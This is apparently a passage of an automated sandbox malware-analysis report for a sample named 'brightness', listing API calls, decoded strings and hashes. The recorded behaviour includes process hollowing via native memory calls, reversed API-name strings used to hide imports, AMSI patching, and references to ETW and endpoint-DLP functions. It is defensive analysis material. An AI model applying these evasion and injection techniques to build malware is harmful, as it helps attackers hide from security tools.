                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917A1F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                          • Opcode ID: 342d9e4659fb58f1a2983f6257ad05a02ec64f6a873b1131e7a77973f3686bad
                                                                                                                                                                          • Instruction ID: 2cb3b4f61eb0d069080170052985db45d3d3f11b5c06b1a5769c56e18b316b10
                                                                                                                                                                          • Opcode Fuzzy Hash: 342d9e4659fb58f1a2983f6257ad05a02ec64f6a873b1131e7a77973f3686bad
                                                                                                                                                                          • Instruction Fuzzy Hash: EA11617564020DAFEB00EF95DC81EEEB7EDEB89710F414464F904D7280D730AA148B60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029182BD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                                                          • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                                                          • API String ID: 2521977463-737317276
                                                                                                                                                                          • Opcode ID: d7e5026e661906f994c5a057a4688d7c93ec1de556004f9cc9442b212ab9e62b
                                                                                                                                                                          • Instruction ID: 583f35fb29f958708ece782d8d370dcd4513469dc14d9278c9f82285da04016e
                                                                                                                                                                          • Opcode Fuzzy Hash: d7e5026e661906f994c5a057a4688d7c93ec1de556004f9cc9442b212ab9e62b
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A016974A0020CAFEB00EFA9D881EAE77EEFB89B00F414860F904D7680C630AD119B64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                          • API String ID: 2719805696-3542721025
                                                                                                                                                                          • Opcode ID: 7c35a8845def5404149cbff49d20473be093fef49f57d098b7bba16d13ec45f0
                                                                                                                                                                          • Instruction ID: 520af47f05858f8e5ff2e47348a44a938e88acea7c31f342f159b6992f139bc9
                                                                                                                                                                          • Opcode Fuzzy Hash: 7c35a8845def5404149cbff49d20473be093fef49f57d098b7bba16d13ec45f0
                                                                                                                                                                          • Instruction Fuzzy Hash: 8401E975A4420DAFEB00EF99D885EAEB7EDEF89B10F514854F904D76C0D730AA148B61
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02918088,?,?,00000000,?,029179FE,ntdll,00000000,00000000,02917A43,?,?,00000000), ref: 02918056
                                                                                                                                                                            • Part of subcall function 02918018: GetModuleHandleA.KERNELBASE(?), ref: 0291806A
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 02918521
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                                                          • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                                                          • API String ID: 3503870465-2520021413
                                                                                                                                                                          • Opcode ID: 61931a2efe4788e938c7c3aafd9ae2787375f9a0fb08c43e097f4ef46864981d
                                                                                                                                                                          • Instruction ID: dfa4a85b6502a45067c30ef570b3344c6bba233c4f43f5520db56b1fb3c3a994
                                                                                                                                                                          • Opcode Fuzzy Hash: 61931a2efe4788e938c7c3aafd9ae2787375f9a0fb08c43e097f4ef46864981d
                                                                                                                                                                          • Instruction Fuzzy Hash: E9016774A4430CAFFB01EFA5DC45EAE77EEFBC9B10F5148A0F50097680D730A9049A54
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 0291DEA0
                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DEF2), ref: 0291DEB6
                                                                                                                                                                          • NtDeleteFile.NTDLL(?), ref: 0291DED5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1459852867-0
                                                                                                                                                                          • Opcode ID: 2616167dbdab5ab5730fad2704fb68ed97dc9a55613a4583e54f6da086eb640b
                                                                                                                                                                          • Instruction ID: e7550f01cb8262f516c3f10f0d6d8f441fa7cc3e7bf0309fc48ab4990b24abbb
                                                                                                                                                                          • Opcode Fuzzy Hash: 2616167dbdab5ab5730fad2704fb68ed97dc9a55613a4583e54f6da086eb640b
                                                                                                                                                                          • Instruction Fuzzy Hash: 38016276A4434C6EEB05E7A18D81BCD77BDAF94701F5004E29200E6091DB746B088B31
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                                                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 0291DEA0
                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DEF2), ref: 0291DEB6
                                                                                                                                                                          • NtDeleteFile.NTDLL(?), ref: 0291DED5
                                                                                                                                                                            • Part of subcall function 02904C0C: SysFreeString.OLEAUT32(0291ED84), ref: 02904C1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1694942484-0
                                                                                                                                                                          • Opcode ID: 2c8e66989093e9963a909a2a6d72f39a0bcd9087cca5bd2ac5bd64bb84d0d63c
                                                                                                                                                                          • Instruction ID: 2a0d5225f7200b2e31734b63fdaadc9b19c35c9e2ca63c488eacf49c9addca8f
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c8e66989093e9963a909a2a6d72f39a0bcd9087cca5bd2ac5bd64bb84d0d63c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C01F475A4020CBEEB11EBE1CD81FDEB7FDDB98701F5045B1A604E2580EB746B048A74
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 02916CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02916D39,?,?,?,00000000), ref: 02916D19
                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02916E2C,00000000,00000000,02916DAB,?,00000000,02916E1B), ref: 02916D97
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2151042543-0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0291881C: LoadLibraryA.KERNEL32(00000000,00000000,02918903), ref: 02918850
                                                                                                                                                                            • Part of subcall function 0291881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02918903), ref: 02918860
                                                                                                                                                                            • Part of subcall function 0291881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02918879
                                                                                                                                                                            • Part of subcall function 0291881C: FreeLibrary.KERNEL32(74AE0000,00000000,02962388,Function_000065D8,00000004,02962398,02962388,000186A3,00000040,0296239C,74AE0000,00000000,00000000,00000000,00000000,02918903), ref: 029188E3
                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A567DC,02A56820,OpenSession,0296237C,0292B40C,UacScan,0296237C), ref: 0292826D
                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,UacScan,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C), ref: 029288B7
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,UacScan,0296237C,0292B40C,00000000,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C), ref: 02928A36
                                                                                                                                                                            • Part of subcall function 02918798: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize,029623A4,0291A774,UacScan), ref: 029187AC
                                                                                                                                                                            • Part of subcall function 02918798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029187C6
                                                                                                                                                                            • Part of subcall function 02918798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,029623A4,0291A3BF,ScanString,029623A4,0291A774,ScanBuffer,029623A4,0291A774,Initialize), ref: 02918802
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0296237C,0292B40C,UacInitialize,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,OpenSession,0296237C,0292B40C,UacScan,0296237C), ref: 02928E28
                                                                                                                                                                            • Part of subcall function 02907E10: GetFileAttributesA.KERNEL32(00000000,?,0291FD00,ScanString,0296237C,0292B40C,OpenSession,0296237C,0292B40C,ScanString,0296237C,0292B40C,UacScan,0296237C,0292B40C,UacInitialize), ref: 02907E1B
                                                                                                                                                                            • Part of subcall function 0291DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0291DFD2), ref: 0291DF3F
                                                                                                                                                                            • Part of subcall function 0291DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0291DF79
                                                                                                                                                                            • Part of subcall function 0291DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0291DFA6
                                                                                                                                                                            • Part of subcall function 0291DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0291DFAF
                                                                                                                                                                            • Part of subcall function 02918184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0291820E), ref: 029181F0
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,OpenSession,0296237C,0292B40C,ScanBuffer,0296237C,0292B40C,Initialize,0296237C,0292B40C,00000000,00000000,00000000,ScanString,0296237C,0292B40C), ref: 0292AE59
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                          • API String ID: 2481178504-1225450241

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,02902000), ref: 029017D0
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,02902000), ref: 029017E6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                          • Opcode ID: eb384b23d5bd641062a03aa57a5a12a69ba4cd9dc7a6a86fe7d7225261866cc6
                                                                                                                                                                          • Instruction ID: 63f68c174da8f476eba43cd83fab1394ad6432d752aee8dc7fab3e44ffe35a8b
                                                                                                                                                                          • Opcode Fuzzy Hash: eb384b23d5bd641062a03aa57a5a12a69ba4cd9dc7a6a86fe7d7225261866cc6
                                                                                                                                                                          • Instruction Fuzzy Hash: 16B13F72A053658FCB15CF68E8C4366BBE1FB86320F1886AED44D8B3C5C770A555CB90

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryW.KERNEL32(amsi), ref: 0291870D
                                                                                                                                                                            • Part of subcall function 029180C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02918148,?,?,00000000,00000000,?,02918061,00000000,KernelBASE,00000000,00000000,02918088), ref: 0291810D
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02918113
                                                                                                                                                                            • Part of subcall function 029180C0: GetProcAddress.KERNEL32(?,?), ref: 02918125
                                                                                                                                                                            • Part of subcall function 02917CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917D6C
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0291876C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                                          • String ID: DllGetClassObject$W$amsi
                                                                                                                                                                          • API String ID: 941070894-2671292670
                                                                                                                                                                          • Opcode ID: bc6156c9c0cb1ab66278d5e723926d3230a93379d58fb4b07d151160ec81d4ce
                                                                                                                                                                          • Instruction ID: 5dbae680e385dd17605e5451376f1de0557414cddc9655b3a08fd9d90db1a081
                                                                                                                                                                          • Opcode Fuzzy Hash: bc6156c9c0cb1ab66278d5e723926d3230a93379d58fb4b07d151160ec81d4ce
                                                                                                                                                                          • Instruction Fuzzy Hash: EAF0AF5044C386B9E200E6B98C85F8BBECD4BD2224F048A4CB1E85A2D2D779D1049BB7

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000,?), ref: 02901B17
                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?), ref: 02901B31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                          • Opcode ID: bd6ed186b5840acd08105496c02275a41056fc41f09835804d8e676cdf6c15f2
                                                                                                                                                                          • Instruction ID: 3658a9e978129b81ce8d73058f744f6ee79b8a52efb09094b5e66cf4c4519e6d
                                                                                                                                                                          • Opcode Fuzzy Hash: bd6ed186b5840acd08105496c02275a41056fc41f09835804d8e676cdf6c15f2
                                                                                                                                                                          • Instruction Fuzzy Hash: 5951DD71A053548FDB15CF6CD9C4766BBD8AB8A324F1885AED44CCB2CAE770C445CBA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0291E86A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.1856714762.0000000002901000.00000020.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.1856521842.0000000002900000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1857057968.000000000292E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859104936.0000000002962000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A56000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000004.00000002.1859207796.0000000002A59000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2900000_brightness.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                          • Opcode ID: 11a252525ce8d5da872f96644ff934cc2c984a07bae34841f1361200094bd8c5
                                                                                                                                                                          • Instruction ID: 2cc887b31333ac98ab511a26f9d187033f314d37bdd1c4541c03977ac2eaa477
